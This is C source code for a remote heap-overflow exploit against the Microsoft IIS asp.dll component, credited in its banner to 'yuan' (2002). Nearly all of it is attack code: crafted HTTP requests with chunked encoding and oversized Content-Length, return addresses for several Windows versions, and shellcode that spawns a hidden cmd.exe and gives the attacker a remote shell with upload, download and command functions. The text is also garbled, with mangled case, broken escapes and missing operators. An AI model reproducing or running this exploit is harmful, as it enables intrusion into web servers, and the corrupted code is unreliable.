#include
#include
#include
#include
#pragma comment (Lib, "WS2_32")
// # Define reteipaddr Eipwin2000
#define fnendlong 0x08
#define nopcode 0x90
#define noplong 0x50
#define buffsize 0x20000
#define pathlong 0x12
#define reteipaddress 0x468
#define shellbuffsize 0x800
#define shellfnnums 14
#define database 0x61
#define dataxorcode 0x55
#define lockbignum 19999999
#define LockBignum2 13579139
#define mcbsize 0x8
#define memsize 0xB200
#define shellport 0x1f90 // 0x1f90 = 8080
#define Webport 80
Void shellcodefnlock ();
Void shellcodefnlock2 ();
Void shellcodefn (char * ecb);
Void shellcodefn2 (char * ecb);
Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkespadd, Int Len)
Void Iisput (int FD, Char * STR);
Void Iisget (Int FD, Char * STR);
Void iiSCMD (int FD, Char * STR);
Void IisReset ();
Void iiISDIE ();
Void Iishelp ();
INT NewRecv (int FD, CHAR * BUFF, INT SIZE, INT FLAG);
Int Newsend (int FD, CHAR * BUFF, INT SIZE, INT FLAG);
Int xordaBegin;
INT LOCKINTVAR1, LOCKINTVAR2;
Char Lockcharvar;
INT main (int Argc, char ** argv)
{
Char * server;
Char * str = "loadLibrarya" "/ x0" "createpipe" "/ x0"
"CreateProcessa" "/ x0" "closehandle" "/ x0"
"Peeknamedpipe" "/ x0"
"Readfile" "/ x0" "Writefile" "/ x0"
"CREATEFILEA" "/ x0"
"Getfilesize" / x0 "
"GetLastError" "/ x0"
"Sleep" "/ x0"
"/X09"" phtdll.dll"""/x0""rtlentercriticalsection""/x0""/x09""sp.dll""/x0""httpextensionproc""/x0"
"/X09""msvcrt.dll""/x0""memcpy""/x0""/x0"
"cmd.exe" "/ x0" "/ x0d / x0a" "it" "/ x0d / x0a" "/ x0"
"Xordata" "/ x0" "xordatareset" "/ x0"
"strend";
// char buff0 [] = "Track / http / 1.1 / nhost:";
Char buff1 [] = "get /";
Char buff2 [] = "default.asp";
Char * buff2add;
Char buff3 [] = "? !! ko";
Char buff4 [] = "http / 1.1 / nhost:";
Char buff5 [] = "/ ncontent-type: Application / X-www-form-urlencoded";
Char buff51 [] = "/ ntransfer-encoding: chunked";
Char buff6 [] = "/ nContent-length: 2147506431 / r / n / r / n"; // 0x80000000 MEMSIZ
E-1
Char buff61 [] = "/ nContent-length: 4294967295 / r / n / r / n"; // 0xffffffff
Char buff7 [] = "/ x10 / x00 / x04 / x05 / x06 / x1c / xf0 / xfd / x7f / x20 / x21 / x0
0 / X01 ";
Char buff11 [] = "/ x02 / x00 / x01 / x02 / x03 / x22 / x22 / x00 / x01 / x22 / x22 / x
00 / X01 ";
Char buff10 [] = "/ x20 / x21 / x00 / x01 / x20 / x21 / x00 / x01";
Char buff9 [] = "/ x20 / x21 / x26 / x27 / x28 / x29 / x2a / x2b / x2c / x2d / x2e / x2f / x30"
Char buff8 [] = "/ x81 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"
/ *
Char buff10 [] = "/ x10 / x00 / x01 / x02 / x03 / x04 / x05 / x06 / x1d / x21 / x00 / x01 / xec / x21 / x0
0 / X01 ";
Char buff11 [] = "/ x10 / x00 / x01 / x02 / x03 / x20 / x21 / x00 / x01 / x01 / x21 / x0
0 / X01 ";
Char buff12 [] = "/ x10 / x00 / x01 / x02 / x06 / x21 / x00 / x00 / x01 / x00 / x21 / x0
0 / X01 ";
CHAR BUFF13 [] = "/ x10 / x00 / x01 / x02 / x03 / x04 / x05 / x06 / x22 / x21 / x00 / x01 / x01";
Char buff14 [] = "/ x10 / x00 / x01 / x02 / x06 / x23 / x21 / x00 / x01 / xe4 / x21 / x0
0 / X01 ";
Char buff15 [] = "/ x10 / x00 / x01 / x02 / x06 / x24 / x21 / x00 / x01 / x90 / x21 / x0
0 / X01 ";
* /
Char * fnendstr = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90";
CHAR SRLF [] = "/ x0d / x0a / x00 / x00";
Char * EIPEXCEPTWIN2000ADD;
Char EIPEXCEPTWIN20002 [] = "/ x80 / x70 / x9f / x74"; // push ebx; reset
Address
Char EIPEXCEPTWIN2000CN [] = "/ x73 / x67 / xfa / x7f"; // push ebx; return
Address
Char EIPEXCEPTWIN2000 [] = "/ x80 / x70 / x97 / x74";
// char eipexceptwin2000 [] = "/ xb3 / x9d / xfa / x77"; // / x01 / x78 "; // Cal
l EBX Address
Char EIPEXCEPTWIN2000MSVCRT [] = "/ xd3 / xcb / x01 / x78";
Char EIPEXCEPTWIN2000SP2 [] = "/ x02 / xbc / x01 / x78";
// char energyXceptwin2000 [] = "/ x0b / x08 / x5a / x68";
// char energyxceptwin2000 [] = "/ x32 / x8d / x9f / x74";
Char EIPEXCEPTWINNT [] = "/ x82 / x01 / xfc / x7f"; // push ESI; RET Add
relatives
// char EIPEXCEPTWINNT [] = "/ x2e / x01 / x01 / x78"; // Call ESI AddRE
SS
// char energyPT2 [] = "/ xd0 / xae / xdc / x77"; //
CHAR BUFF [Buffsize];
Char recvbuff [buffsize];
Char shellcodebuff [buffsize];
Char shellcodebuff2 [buffsize];
Struct SockAddr_in S_IN2, S_IN3;
Struct hostent * he;
Char * shellcodefnadd, * chkespadd;
Unsigned int sendpacketlong, buff2long, shelladd, packlong
INT I, J, K, L, STRHEADLONG;
UNSIGNED CHAR TEMP;
Int fd;
U_SHORT Port, Port1, Shellcodeport;
Socket D_IP;
Wsadata wsadata;
INT OFFSET = 0;
INT OVERADD = Reteipaddress;
Int result;
FPRINTF (stderr, "/ n Iis asp.dll overflow program 2.0."); fprintf (stderr, "/ n copy by yuan 2002.4.24.");
FPrintf (stderr, "/ n welcome to my homepage
http://yuange.yeah.net. ");
FPRINTF (stderr, "/ n welcome to
http://www.nsfocus.com. ");
FPRINTF (stderr, "/ n usage:% s
v [0]);
BUFF2ADD = BUFF2;
IF (argc <2) {
FPRINTF (stderr, "/ n please enter the web server:");
Gets (recvbuff);
For (i = 0; i IF (Recvbuff [I]! = ') Break; } Server = Recvbuff; IF (i FPRINTF (stderr, "/ n please enter the .asp filename:"); Gets (shellcodebuff); For (i = 0; i IF (ShellcodeBuff [I]! = ') Break; } Buff2add = shellcodebuff i; Printf ("/ n .asp file name:% s / n", buff2add); } EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN2000; // Printf ("/ n Argc% D Arg V% S", Argc, Argv [5]); IF (argc> 5) { IF (strCMP (Argv [5], "CN") == 0) { EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN2000CN; Printf ("/ n for the cn system./n"); } IF (strCMP (Argv [5], "SP0") == 0) { EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN20002; Printf ("/ n for the sp0 system./N"); } IF (strcmp (Argv [5], "MSVCRT") == 0) { EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN2000MSVCRT; Printf ("/ n use msvcrt.dll jmp to shell./N"); } IF (strCMP (Argv [5], "SP2") == 0) { EIPEXCEPTWIN2000ADD = EIPEXCEPTWIN2000SP2; Printf ("/ n use sp2 msvcrt.dll jmp to shell./N"); } } Result = WSASTARTUP (Makeword (1, 1), & WSADATA); IF (Result! = 0) { FPRINTF (stderr, "Your Computer Was Not Connected" To The Internet At the Time That " "this program was launched, or you" "Do Not Have A 32-bit" "Connection to the Internet."); Exit (1); } / * IF (argc> 4) { OFFSET = ATOI (Argv [4]); } // Overadd = offset; // packlong = 0x10000-offset 0x8; IF (Offset <-0x20 || Offset> 0x20) { FPRINTF (stderr, "/ n offset error! offset -32 - 32."); Gets (buff); Exit (1); } * / IF (argc <2) { // wsacleanup (); // EXIT (1); } Else Server = argv [1]; For (i = 0; i IF (Server [i]! = ') Break; } IF (i For (i = 0; i 3 IF (Server [i] == ':') { IF (Server [i 1] == '//' || Server [i 1] == '/') { IF (Server [i 2] == '//' || Server [i 2] == '/') { Server = i; Server = 3; Break; } } } } For (i = 1; i <= strlen (server); i) { IF (Server [i-1] == '//' || Server [i-1] == '/') Server [i-1] = 0; } D_IP = inet_addr (server); IF (D_IP == - 1) { He = gethostByname (Server); IF (! HE) { WSACLEANUP (); Printf ("/ n can't get the ip of% s! / n", server); Gets (buff); Exit (1); } Else Memcpy (& D_IP, HE-> H_ADDR, 4); } IF (Argc> 3) Port = ATOI (Argv [3]); Else Port = Webport; IF (port == 0) Port = Webport; FD = Socket (AF_INET, SOCK_STREAM, 0); i = 8000; Setsockopt (FD, SOL_SOCKET, SO_RCVTIMEO, (Const Char *) & I, SizeOf (i)); S_IN3.SIN_FAMILY = AF_INET; S_IN3.SIN_PORT = HTONS (Port); S_IN3.SIN_ADDR.S_ADDR = D_IP; Printf ("/ N Nuke IP:% S Port% D", INET_NTOA (S_IN3.SIN_ADDR), HTONS (S_IN3.SIN_ Port)); IF (Connect (FD, (Struct SockAddr *) & S_IN3, SIZEOF (Struct SockAddr_in))! = 0) { CloseSocket (FD); WSACLEANUP (); FPRINTF (stderr, "/ n connect err."); Gets (buff); Exit (1); } _asm { MOV ESI, ESP CMP ESI, ESP } _chkesp (); Chuestspadd = _chkesp; Temp = * chuest; IF (Temp == 0xE9) { chuesthant I = * (int *) Chuestion; Chkespadd = i; Chkespadd = 4; } / * Shellcodefnadd = shellcodefnlock; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; Shellcodefnadd = 4; } For (k = 0; k <= 0x500; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } * / MEMSET (BUFF, NOPCODE, BUFFSIZE); / * STRCPY (BUFF, BUFF0); IF (Argc> 6) STRCAT (BUFF, Argv [6]); Else Strcat (BUFF, Server); STRCAT (BUFF, "/ R / N / R / N"); // proxy_connection: Keep-alive / r / n "); STRCAT (BUFF, BUFF1); * / STRCPY (BUFF, BUFF1); strheadlong = Strlen (BUFF); Overadd = strheadlong-1; IF (argc> 2) buff2add = argv [2]; For (;; buff2add) { Temp = * buff2add; IF (Temp! = '//' && Temp! = '/') Break; } // Printf ("/ NFILE:% S", BUFF2ADD); Buff2long = Strlen (buff2add); STRCAT (BUFF, BUFF2ADD); // fprintf (stderr, "/ n offset:% D / N", OFFSET); // offset = strheadlong-strlen (buff1); / * FOR (i = 0x404; i <= 0x500; i = 8) { Memcpy (buff offset i, "/ x42 / x42 / x42 / x2d", 4); // 0x2d Sub Eax, Num32 Memcpy (Buff Offset i 4, EIPEXCEPTWIN2000ADD, 4); } IF (argc> 5) { IF (strCMP (Argv [5], "SP2") == 0) {MEMCPY (Buff Offset i, "/ X58", 1); } } For (i = 0x220; i <= 0x380; i = 8) { Memcpy (buff offset i, "/ x42 / x42 / x42 / x2d", 4); // 0x2d Sub Eax, Num32 Memcpy (Buff Offset i 4, EIPEXCEPTWINNT, 4); } FOR (i = 0x580; i <= 0x728; i = 8) { Memcpy (buff offset i, "/ x42 / x42 / x42 / x2d", 4); // 0x2d Sub Eax, Num32 Memcpy (Buff Offset i 4, EIPEXCEPTWINNT, 4); } * / // WinNT 0x2cc or 0x71c Win2000 0x130 OR 0x468 // Memcpy (buff offset i 8, exceptret, strlen (exceptret)); Shellcodefnadd = shellcodefnlock; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; Shellcodefnadd = 4; } For (k = 0; k <= 0x500; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } MEMSET (ShellcodeBuff2, Nopcode, Buffsize); i = 0x1000; Memcpy (shellcodebuff2 i 4, shellcodefnadd k 8, 0x100); Shellcodefnadd = shellcodefn; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; Shellcodefnadd = 4; } FOR (k = 0; k <= buffsize; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } // k = 0x Memcpy (shellcodeBuff, shellcodefnadd, k); // j); Cleanchkesp (Shellcodefnadd, ShellcodeBuff, ChkespAdd, K); For (j = 0; j <0x400; j) { IF (Memcmp (STR J, "Strend", 6) == 0) Break; } Memcpy (ShellcodeBuff K, STR, J); SendPacketlong = K J; For (k = 0; k <= 0x200; k) { IF (Memcmp (ShellcodeBuff2 i 4 K, Fnendstr, Fnendlong) == 0) Break;} For (j = 0; j Temp = shellcodebuff [j]; // Temp ^ = DataXorcode; ShellcodeBuff2 [i 4 K] = Database TEMP / 0X10; K; ShellcodeBuff2 [i 4 K] = Database Temp% 0x10; K; } J = i K; J = J% 8 3; ShellcodeBuff2 [i J K] = 0; // j = strlen (shellcodebuff2)% 8 3; For (j = 0; j <= 0xE000; J = 4) { STRCAT (ShellcodeBuff2, "/ X41 / X41 / X41 / X41"); // 0x2d Sub Eax, Num32 // strcat (shellcodebuff2, energyxceptwin2000cn); } / * STRCAT (ShellcodeBuff2, "/ X90 / X90 / X90 / X90 / X90 / XEB / X0F / X66 / X83 / X6C / X24 / X02 / X01 / X66 / X81 / X2C / X24 / X01 / X01 / XFF / X24 / X24 / XE8 / XEC / XFF / XFF / XFF / X90 ") For (j = 0; j <= 0xb00; j = 4) { STRCAT (ShellcodeBuff2, "x90 / x90 / x90 / x2d"); // 0x2d Sub Eax, Num32 } * / // Printf ("/ NBUFF:% S", BUFF); Printf ("/ N shellcode long 0x% x / n", sendpacketlong); IF (Argc> 4 && Strmp (Argv [4], "Apache") == 0) { STRCAT (BUFF, "); } Else Strcat (buff, buff3); Printf ("/ n packetlong: 0x% x / n", sendpacketlong); STRCAT (BUFF, BUFF4); IF (Argc> 6) STRCAT (BUFF, Argv [6]); Else Strcat (BUFF, Server); STRCAT (BUFF, BUFF5); IF (Argc> 4 && Strcmp (Argv [4], "Apache") == 0) STRCAT (BUFF, "); Else STRCAT (BUFF, ShellcodeBuff2); // strcat (buff, buff51); IF (Argc> 4 && (STRCMP (Argv [4], "WinXP") == 0 || StrCMP (Argv [4], "Apache") == 0) { Printf ("/ n for% s system / n", argv [4]); STRCAT (BUFF, BUFF61); } Else Strcat (buff, buff6); // Printf ("/ N Send Buff: / N% S", BUFF); / * I = Strlen (BUFF); MEMSET (Buff I, 'A', 0xC000); MEMSET (BUFF I 0XC000-Strlen (BUFF7), 0, 1); STRCAT (BUFF I 0XC000-0X10-Strlen (BUFF7), BUFF7); * / // strcpy (buff8, buff7); / * TEMP = BUFF7 [5]; Temp- = offset * 0x10; BUFF7 [5] = TEMP; i = * (int *) (buff7 4) 2; Printf ("/ nseh = 0x% x / n", i); * / / * For (i = 0; i <8; i) { Temp = BUFF7 [I]; Printf ("% 2X", TEMP); } * / / * For (i = 0; i <0xc000 / 0x10; i) { STRCAT (BUFF, BUFF7); } * / // Printf ("/ NBUFF =% S / N", BUFF); // strcat (buff, "/ r / n"); // Printf ("/ N Send Buff: / N% S", BUFF); // STRCPY (Buff Overadd Noplong, Shellcode); Sendpacketlong = Strlen (BUFF); // Printf ("BUFF: / N% S", BUFF 0x10000); / * #ifdef debug _asm { LEA ESP, BUFF Add ESP, OVERADD RET } #ENDIF * / Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; XORDATABEGIN = 0; FOR (i = 0; i <1; i) { J = sendpacketlong; // buff [0x2000] = 0; FPRINTF (stderr, "/ n send packet% d bytes.", J); // Gets (buff); Send (FD, BUFF, J, 0); BUFF7 [0] = McBsize; J = MEMSIZE 0X10; i = 0; IF (Argc> 4 && strcmp (Argv [4], "WinXP") == 0) { J = 0x18; i = 8; } For (k = 0; i <0xc000; i = 0x10) { IF (i> = j) { K = ((i-j) / (mcbsize * 8)); IF (k <= 6) { Memcpy (buff7 0x8, buff10, 8); BUFF7 [0x8] = BUFF8 [K]; BUFF7 [0xc] = BUFF9 [K]; } Else Memcpy (buff7, buff11, 0x10); } Memcpy (buff i, buff7, 0x10); } IF (Argc> 4 && Strmp (Argv [4], "Apache") == 0) { For (k = 0xb000; k <= 0xc000; k = 2) { MEMSET (BUFF K, 0x0D, 1); MEMSET (BUFF K 1,0x0a, 1); } BUF [0xC000] = 0; // for (k = 0; k <0x10; K) Send (FD, BUFF, 0XC000, 0); // Printf ("/ NBUFF:% S / N", BUFF); } Else Send (FD, BUFF, 0XC000, 0); K = 0; IOCTLSocket (FD, Fionbio, & K); J = 0; While (j == 0) { K = NewRecv (FD, Recvbuff, Buffsize, 0); IF (k> = 8 && strstr (Recvbuff, "xordata")! = 0) { XORDATABEGIN = 1; FPRINTF (stderr, "/ n ok! RECV% D Bytes / N", K); RECVBUFF [K] = 0; // Printf ("/ N RECV:% S", Recvbuff); // for (k- = 8, j = 0; k> 0; k- = 4, J) Printf ("Recvdata: 0x% x / n", * (int *) (Re) CVBUFF 8 4 * J)))) K = -1; J = 1; } IF (k> 0) { RECVBUFF [K] = 0; FPRINTF (stderr, "/ n recv: / n% s", recvbuff); } } } K = 1; IOCTLSocket (FD, Fionbio, & K); // fprintf (stderr, "/ n now begin: / n"); / * For (i = 0; i SRLF [I] ^ = DataXorcode; } Send (FD, SRLF, STRLEN (SRLF), 0); Send (FD, SRLF, STRLEN (SRLF), 0); Send (FD, SRLF, STRLEN (SRLF), 0); * / K = 1; L = 0; While (k! = 0) { IF (k <0) { L = 0; i = 0; While (i == 0) { Gets (buff); IF (Memcmp (BUFF, "IISH", 4) == 0) { Iishelp (); i = 2; } IF (Memcmp (BUFF, "IISPUT", 6) == 0) { IISPUT (FD, BUFF 6); i = 2; } IF (Memcmp (Buff, "Iisget", 6) == 0) { Iisget (FD, BUFF 6); i = 2; } IF (Memcmp (BUFF, "IISCMD", 6) == 0) { IISCMD (FD, BUFF 6); i = 2; } IF (Memcmp (Buff, "Iisreset", 8) == 0) { IisReset (FD, BUFF 6); i = 2; } IF (Memcmp (BUFF, "IISDIE", 6) == 0) { IISDIE (FD, BUFF 6); i = 2; } IF (i == 2) i = 0; ELSE I = 1; } K = Strlen (BUFF); Memcpy (buff K, SRLF, 3); // Send (FD, SRLF, Strlen (SRLF), 0); // fprintf (stderr, "% s", buff); / * For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; // buff [i] ^ = DataXorcode; } Send (FD, BUFF, K 2, 0); * / Newsend (FD, BUFF, K 2, 0); // Send (FD, SRLF, Strlen (SRLF), 0); } K = NewRecv (FD, BUFF, BUFFSIZE, 0); IF (xordATABEGIN == 0 && K> = 8 && strstr (buff, "xordata")! = 0) { XORDATABEGIN = 1; K = -1; } IF (k> 0) { // fprintf (stderr, "rv% D Bytes", K); / * IF (xordATABEGIN == 1) { For (i = 0; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; } } * / L = 0; BUFF [K] = 0; FPRINTF (stderr, "% s", buff); } Else { Sleep (20); IF (l <20) k = 1; L; } // IF (k == 0) Break; } CloseSocket (FD); WSACLEANUP (); FPRINTF (stderr, "/ n the server close connect."); Gets (buff); Return (0); } Void shellcodefnlock () { _asm { NOP NOP NOP NOP NOP NOP NOP NOP JMP next1 GetIAdd: Pop Edi MOV ESP, EDI And ESP, 0xffffff0f0 JMP next2 Getshelladd: PUSH 0x01 Mov Eax, EDI INC EAX INC EAX INC EAX INC EAX INC EAX Mov Edi, EAX MOV ESI, EDI // SUB SP, 8 XOR ECX, ECX LOOPLOCK: LODSB CMP AL, CL JZ Shell SUB Al, Database MOV AH, Al Lodsb SUB Al, Database SHL AH, 4 Add Al, AH // Lea Eax, PTR Word [EDX * 4 Al] Stosb JMP LOOPLOCK Next1: Call getediadd Next2: Call getshelladd Shell: NOP NOP NOP NOP NOP NOP NOP NOP } } Void shellcodefn (char * ecb) {Char Buff [shellbuffsize 2]; INT * EXCEPT [3]; FarProc MemcpyAdd; FarProc Msvcrtdlladd; FarProc HTTPEXTENSIONPROCADD; FarProc aspdlladd; FarProc RtlentercriticalSectionAdd; FarProc NTDLLLDD; FarProc SleepAdd; FarProc getlasterroradd; FarProc getFileSizeAdd; FarProc CreatefileaAdd; FarProc WritefileAdd; FarProc ReadfileAdd; FarProc PeeknamedpiPireAdd; FarProc CloseHandD; FarProc CreateProcessAdd; FarProc CreatePipeAdd; FarProc ProcloadLib; FarProc APIFNADD [1]; FarProc ProcgetAdd = 0; FarProc WriteClient; FarProc ReadClient; HCONN CONNID; FarProc shellcodefnadd = ECB; Char * stradd, * stradd2, * dooradd; Int Imgbase, Fnbase, i, k, l, thedoor; Handle Libhandle; INT fpt; // libwsock32; Startupinfo SiINFO; PROCESS_INFORMATION processinformation; Handle Hreadpipe1, hwritepipe1, hreadpipe2, hwritepidipe2; INT LBYTESREAD; INT LOCKINTVAR1, LOCKINTVAR2; Char Lockcharvar; Int shelllocknum; // unsigned char TEMP; Security_attributes sa; _asm {JMP nextcall GetStradd: Pop Stradd Lea Edi, Except Mov Eax, DWORD PTR FS: [0] MOV DWORD PTR [EDI 0x08], EAX Mov DWORD PTR FS: [0], EDI } Except [0] = 0xfffffffff; Except [1] = stradd-0x07; IMGBase = 0x77E00000; _asm { Call getExceptretadd } For (; imgbase <0xBFFA0000, ProcgetAdd == 0;) { IMGBase = 0x10000; IF (imgbase == 0x78000000) IMGBase = 0xBff00000; IF (* (Word *) IMGBASE == 'ZM' && * (Word *) (IMGBASE * (INT *) (IMGBase 0x3c)) == 'EP') {fnbase = * (int *) (IMGBASE * (INT *) (IMGBase 0x3c) 0x78) IMGB ASE; K = * (int *) (fnbase 0xc) IMGBASE; IF (* (int *) k == 'NREK' && * (int *) (k 4) == '23LE') { LibHandle = IMGBASE; K = IMGBASE * (INT *) (FNBase 0x20); For (l = 0; l <* (int *) (fnbase 0x18); L, K = 4) { IF (* (INT *) (IMGBase * (int *) k) == 'Pteg' && * (int *) (4 i MGBase * (int *) k) == 'acor') { K = * (Word *) (L L IMGBASE * (INBASE 0x24)); K = * (int *) (fnbase 0x10) -1; K = * (int *) (K K K K IMGBASE * (INT *) (FNBase 0x1c)) ; ProcgetAdd = K IMGBASE; Break; } } } } } // Search Kernel32. DLL module address and API function getProcAddress address / (Note that this is not in the case where the search page is processed. IF (procgetadd == 0) goto die; i = stradd; For (k = 1; * stradd! = 0; k) { IF (* stradd == 0x9) libhandle = procloadLib (stradd 1); Else apifnadd [k] = procgetadd (libhandle, stradd); FOR (; * stradd! = 0; stradd) { } stradd; } stradd; K = 0x7ffdf020; * (int *) k = rtlentercriticalsectionAdd; K = stradd; stradd = i; THEDOOR = 0; i = 0; _asm { JMP getDoorcall GetDooradd: Pop Dooradd; MOV L, ESP Call getExceptretadd } IF (i == 0) { i; IF (* (int *) ECB == 0x90) { IF (* (int *) (* (INT *) (ECB 0x64)) == 'ok !!') { i = 0; THEDOOR = 1; } } } IF (i! = 0) { * (int *) (DOORADD-0x0C) = httpextensionprocadd; * (int *) (dooradd-0x13) = shellcodefnadd; ECB = 0; _asm { Call getExceptretadd } i = ECB; I & = 0xffff000; ECB = i; ECB = 0x1000; For (; i IF (* (int *) ECB == 0x90) { IF (* (INT *) == (int *) ECB) { IF (* (int *) (INT *) (ECB 0x64) == 'ok !!') Break; } } } i = 0; _asm { Call getExceptretadd } I & = 0xffff000; i = 0x1000; For (; i IF (* (int *) i == httpextensionprocadd) { * (int *) i = DOORADD-7; // Break; } } // * (INT *) (DOORADD-0X0C) = httpextensionprocadd; } WriteClient = * (int *) (ECB 0x84); Readclient = * (int *) (ECB 0x88); CONNID = * (int *) (ECB 8); STRADD = K; _asm { Lea Edi, Except MOV Eax, DWORD PTR [EDI 0x08] Mov DWORD PTR FS: [0], EAX } IF (thisDoor == 0) { _asm { MOV EAX, 0xfffffffFFFFFF Mov DWORD PTR FS: [0], EAX } } stradd2 = stradd; STRADD = 8; K = 0x20; WriteClient (connid, * (int *) (ECB 0x6C), & k, 0); K = 8; WriteClient (Connid, Stradd 9, & K, 0); // SleepAdd (100); Shelllocknum = LockBignum2; IF (* (int *) * (ECB 0x64) == 'OK !!' && * (int *) (* (int *) (ECB 0x6 4) 4) == 'NOTX') shelllocknum = 0; // iiscmd: Lockintvar1 = shelllocknum% LockBignum; Lockintvar2 = Lockintvar1; IISCMD: / * Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; * / Sa.nlength = 12; Sa.lpsecurityDescriptor = 0; Sa.binherithandle = true; CreatePipeadd (& Hreadpipe1, & HwritePipe1, & Sa, 0); CreatePipeadd (& Hreadpipe2, & HwritePipe2, & Sa, 0); // ZeromeMory (& SiInfo, SIZEOF (SIINFO); _asm { Lea Edi, SIINFO XOR EAX, EAX MOV ECX, 0x11 RepNZ Stosd } Siinfo.dwflags = startf_useshowwindow | Startf_usestdhandles; SiINFO.WSHOWINDOW = SW_HIDE; SiINFO.HSTDINPUT = HREADPIPE2; SIINFO.HSTDOUTPUT = HWRITEPIPE1; SiINFO.HSTDERROR = hwritepidipe1; K = 0; // while (k == 0) // { K = CreateProcessAdd (Null, Stradd2, Null, Null, 1,0, Null, Null, & SiINFO, & PRO CESSINFORMATION); // stradd = 8; //} SleepAdd (200); // peeknamedpipeadd (Hreadpipe1, buff, shellbuffsize, & lbytesread, 0, 0); i = 0; While (1) { Peeknamedpipeadd (Hreadpipe1, Buff, Shellbuffsize, & lbytesRead, 0, 0); IF (LbytesRead> 0) { i = 0; Readfileadd (Hreadpipe1, Buff, LbytesRead, & lbytesread, 0); IF (LbytesRead> 0) { FOR (k = 0; k Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [K] ^ = LOCKCHARVAR; // DataXorcode; // buff [k] ^ = DataXorcode; } WriteClient (Connid, Buff, & lbytesRead, 0); // hse_io_sync); // SleepAdd (20); } } Else { // SleepAdd (10); L = 0; IF (i <50) { L = 1; i; K = 1; LbytesRead = 0; } While (l == 0) { i = 0; Lbytesread = shellbuffsize; K = ReadClient (ConnID, BUFF, & LBYTESREAD); For (l = 0; l Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [L] ^ = LOCKCHARVAR; // DataXorcode; } IF (k == 1 && lbytesread> = 5 && buff [0] == 'i' && buff [1] == 'i' && buff [2 ] == 's' && buff [3] ==' c '&& buff [4] ==') { K = 8; Writefileadd (HWritePiPiPi2, Stradd, K, & K, 0); // EXIT cmd.e XE WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe stradd2 = BUFF 5; BUFF [LbytesRead] = 0; Goto IISCMD; } IF (k == 1 && lbytesread> = 5 && buff [0] == 'r' && buff [1] == 'e' && buff [2 ] == 's' && buff [3] == 'e' && buff [4] == 't') { LbytesRead = 0x0c; WriteClient (Connid, Stradd 0x11, & lbytesRead, 0); Lockintvar1 = shelllocknum% LockBignum; Lockintvar2 = Lockintvar1; LbytesRead = 0; } IF (k == 1 && lbytesread> = 5 && buff [0] == 'i' && buff [1] == 'i' && buff [2 ] == 's' && buff [3] == 'r' && buff [4] == 'r') { K = 8; Writefileadd (HWritePiPiPi2, Stradd, K, & K, 0); // EXIT cmd.e XE Writefileadd (HWritePiPiPi2, Stradd, K, & K, 0); // EXIT cmd.e XE * (int *) (dooradd-0x0c) = 0; SleepAdd (0x7ffffff); _asm { MOV EAX, 0 MOV ESP, 0 JMP EAX } } IF (k == 1 && lbytesread> 4 && buff [0] == 'p' && buff [1] == 'u' && buff [2] = = 't' && buff [3] == ') { L = * (int *) (buff 4); // WritefileAdd (FPT, BUFF, LBYTESREAD, & LBYTESREAD, NULL); FPT = CREATEFILEAADD (buff 0x8, file_flag_write_through gene Ric_Write, File_Share_read, null, create_always, file_attribute_normal, 0); K = getLasterRoradd (); i = 0; While (l> 0) { Lbytesread = shellbuffsize; K = ReadClient (ConnID, BUFF, & LBYTESREAD); IF (k == 1) { IF (LbytesRead> 0) { FOR (k = 0; k Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = Lockintvar1% Lockbignum; Lockcharvar = lockintvar1% 0x100; BUFF [K] ^ = LOCKCHARVAR; // DataXorcode; } L- = lbytesread; // if (fpt> 0) WritefileAdd (FPT, BUFF, LBYTESREAD, & LBYTESREA D, NULL); // Else SleepAdd (010); } // if (i> 100) l = 0; } Else { SleepAdd (0100); i; } IF (i> 10000) l = 0; } CloseHandleAdd (FPT); L = 0; } Else { IF (k == 1 && lbytesread> 4 && buff [0] == 'g' && buff [1] == 'e' && buff [2] == 'T' && buff [3] == ') { // fpt = cretefileaadd (buff 4, generic_read, file_share _Read, null, open_existing, file_attribute_normal, 0); FPT = CREATEFILEAADD (Buff 4, Generic_Read, File_Share_R EAD File_Share_Write, Null, Open_EXISTING, FILE_ATTRIBUTE_NORMAL, 0); SleepAdd (100); L = getFileSizeAdd (fpt, & k); * (int *) BUFF = 'EZIS'; // size * (int *) (BUFF 4) = L; LbytesRead = 8; For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; } WriteClient (Connid, Buff, & lbytesRead, 0); // HSE_IO_S YNC); // SleepAdd (100); i = 0; While (l> 0) { K = shellbuffsize; ReadfileAdd (FPT, BUFF, K, & K, 0); IF (k> 0) { For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // Dataxorcode ; } i = 0; L- = K; WriteClient (connid, buff, & k, 0); // 